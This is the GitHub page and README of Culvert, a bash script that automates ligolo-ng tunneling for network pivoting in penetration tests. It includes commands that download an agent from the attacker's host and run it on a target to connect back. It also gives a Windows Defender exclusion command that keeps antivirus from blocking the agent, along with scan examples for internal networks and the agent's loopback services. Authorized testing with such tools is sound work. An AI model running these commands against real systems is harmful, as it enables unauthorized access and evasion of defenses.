Skip to content

Real-Fruit-Snacks/Culvert

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
.github
.github
 
 
docs
docs
 
 
.gitignore
.gitignore
 
 
CHANGELOG.md
CHANGELOG.md
 
 
CODE_OF_CONDUCT.md
CODE_OF_CONDUCT.md
 
 
CONTRIBUTING.md
CONTRIBUTING.md
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
SECURITY.md
SECURITY.md
 
 
culvert.sh
culvert.sh
 
 

Repository files navigation

Culvert

Bash Platform License Toolkit

Pivot under the obstruction — one-command ligolo-ng tunnel setup.

Auto-downloads proxy and agent binaries, configures TUN interface, starts a file server for agent transfer, and provides copy-paste commands with your IP pre-filled. No proxychains needed -- access target networks directly.

Authorization Required: Designed exclusively for authorized security testing with explicit written permission.

Quick Start

Prerequisites

  • Linux (Kali, Ubuntu, Debian) with root/sudo
  • curl, jq, tar (binary download and extraction)
  • python3 (optional, for HTTP file server)

Install

curl -O https://raw.githubusercontent.com/Real-Fruit-Snacks/Culvert/main/culvert.sh
chmod +x culvert.sh

Run

sudo ./culvert.sh auto

Follow the on-screen instructions to transfer the agent, connect, select a session, add routes, and start the tunnel.

Verify

# After tunnel is running, test connectivity
nmap -sV 10.10.10.0/24           # Scan target network
ssh user@10.10.10.20             # SSH to internal host
curl http://10.10.10.50          # Access internal web server

Cleanup

sudo ./culvert.sh cleanup

Features

One-Command Setup

Run sudo ./culvert.sh auto and the script downloads ligolo-ng binaries, creates the TUN interface, starts a file server on port 8000, and launches the proxy.

sudo ./culvert.sh auto

Auto IP Detection

Automatically detects your attack IP by checking tun0, tun1, tap0, and the default route in priority order. All generated commands use your actual IP.

# Detection order: tun0 -> tun1 -> tap0 -> default route

Multi-Platform Agents

Downloads agent binaries for Linux (amd64/arm64), Windows (amd64), and macOS (arm64). Transfer commands provided for each platform including curl, PowerShell iwr, and certutil fallback.

./culvert.sh agent-cmd            # Show all agent commands
./culvert.sh agent-cmd 10.0.0.1   # With custom IP

Clean Teardown

Removes all routes, stops the file server and proxy, and tears down the TUN interface in order. No orphaned processes or stale routes left behind.

sudo ./culvert.sh cleanup

Modular Commands

Each operation is available as a standalone subcommand for granular control over the setup process.

./culvert.sh download              # Download binaries only
sudo ./culvert.sh setup-tun        # Create TUN only
sudo ./culvert.sh add-route 10.10.10.0/24
./culvert.sh status                # Show current state

Step-by-Step Guidance

After setup, the script displays numbered steps with exact commands for agent transfer, connection, session selection, route addition, and tunnel start.

STEP 1: Download agent on target machine
  curl http://10.10.14.5:8000/ligolo-agent -o /tmp/a && chmod +x /tmp/a
STEP 2: Run agent on target
  /tmp/a -connect 10.10.14.5:11601 -ignore-cert

Reach the Agent's Own Localhost

Ligolo-ng treats 240.0.0.0/4 as a magic redirect range: any packet to a 240.x.x.x address is forwarded to the agent's own 127.0.0.1. One subcommand wires up a 240.0.0.1/32 route so you can scan and hit services bound to the agent's loopback (databases, admin panels, stray SSH) directly from your host:

sudo ./culvert.sh localhost

# Then, from any terminal:
nmap -sV 240.0.0.1              # scan the agent's local ports
curl http://240.0.0.1:8080/     # hit an admin panel bound to 127.0.0.1:8080
ssh user@240.0.0.1              # SSH to the agent itself

See the ligolo-ng Localhost docs for the full protocol details.

WebUI Dashboard

Ligolo-ng ships a web dashboard for managing agents, sessions, and tunnels in a browser. Culvert enables it via a dedicated subcommand or by setting WEBUI=1 in front of auto:

# Option A: start proxy + WebUI only (binaries and TUN already in place)
sudo ./culvert.sh webui

# Option B: full auto setup with WebUI enabled alongside the CLI
WEBUI=1 sudo ./culvert.sh auto

# Custom bind address (default 127.0.0.1:8443)
WEBUI_LISTEN=10.10.14.5:8443 WEBUI=1 sudo ./culvert.sh auto

On first launch the proxy console prompts once for an admin username and password; those are persisted under ~/.ligolo-proxy/ and reused on subsequent runs. The dashboard then lives at https://<WEBUI_LISTEN>/ — point a browser at it (self-signed TLS → expect the browser warning).

See the ligolo-ng WebUI docs for a feature tour.

Architecture

culvert.sh    Single-file setup script (all logic)
README.md           Documentation
LICENSE             MIT License

The script follows a linear execution flow: download binaries from GitHub releases, create a TUN interface via ip tuntap, start a Python HTTP file server for agent transfer, then launch ligolo-proxy with a trap to clean up on exit.

All Commands

Command Root Description
auto Yes Full setup -- download, configure, start proxy
cleanup Yes Stop proxy, file server, remove routes and TUN
download No Download ligolo-ng binaries to ~/.ligolo-ng
setup-tun Yes Create and activate TUN interface
teardown-tun Yes Remove TUN interface
proxy [opts] No Start proxy with custom options
add-route <cidr> Yes Add route to TUN
del-route <cidr> Yes Remove route from TUN
localhost Yes Add 240.0.0.1/32 route — reaches the agent's own 127.0.0.1
webui Yes Start the proxy with the ligolo-ng WebUI dashboard enabled
agent-cmd [ip] No Show agent commands for all platforms
status No Show binary, TUN, route, and proxy status

Configuration

Variable Default Description
LIGOLO_DIR ~/.ligolo-ng Binary storage directory
TUN_NAME ligolo TUN interface name
PROXY_PORT 11601 Proxy listen port
WEBUI 0 Enable the WebUI in auto mode (1 to turn on)
WEBUI_LISTEN 127.0.0.1:8443 WebUI + REST API bind address 
PROXY_PORT=443 sudo ./culvert.sh auto
LIGOLO_DIR=/opt/ligolo sudo ./culvert.sh download

Troubleshooting

Agent won't connect -- Ensure the proxy port is open:

iptables -I INPUT -p tcp --dport 11601 -j ACCEPT

Windows Defender blocks agent -- Add exclusion before downloading:

Add-MpPreference -ExclusionPath "C:\Users\Administrator\a.exe"

Connection drops when adding route -- Do not route the target's own network through ligolo. Route only the internal networks behind the target.

Invalid CIDR prefix -- The network address must align to the prefix boundary (e.g., 10.1.146.0/24, not 10.1.146.5/24).

Security

Report vulnerabilities via SECURITY.md -- do not open public issues.

Culvert does not:

  • Modify ligolo-ng source code or binaries
  • Store credentials or sensitive data
  • Persist after cleanup
  • Open ports other than the proxy port and file server
  • Bypass any security controls

Credits

License

MIT -- Copyright 2026 Real-Fruit-Snacks

About

Pivot under the obstruction — one-command ligolo-ng tunnel setup. Auto-downloads binaries, configures TUN, guides routing.

real-fruit-snacks.github.io/Culvert/

Topics

linux shell bash automation networking cybersecurity penetration-testing infosec tunneling red-team pivoting security-tools ligolo-ng ligolo

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Contributing

Contributing

Security policy

Security policy
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases 3

v1.1.0 - Cleanup Command & Bug Fixes Latest
Jan 27, 2026
+ 2 releases

Contributors

Languages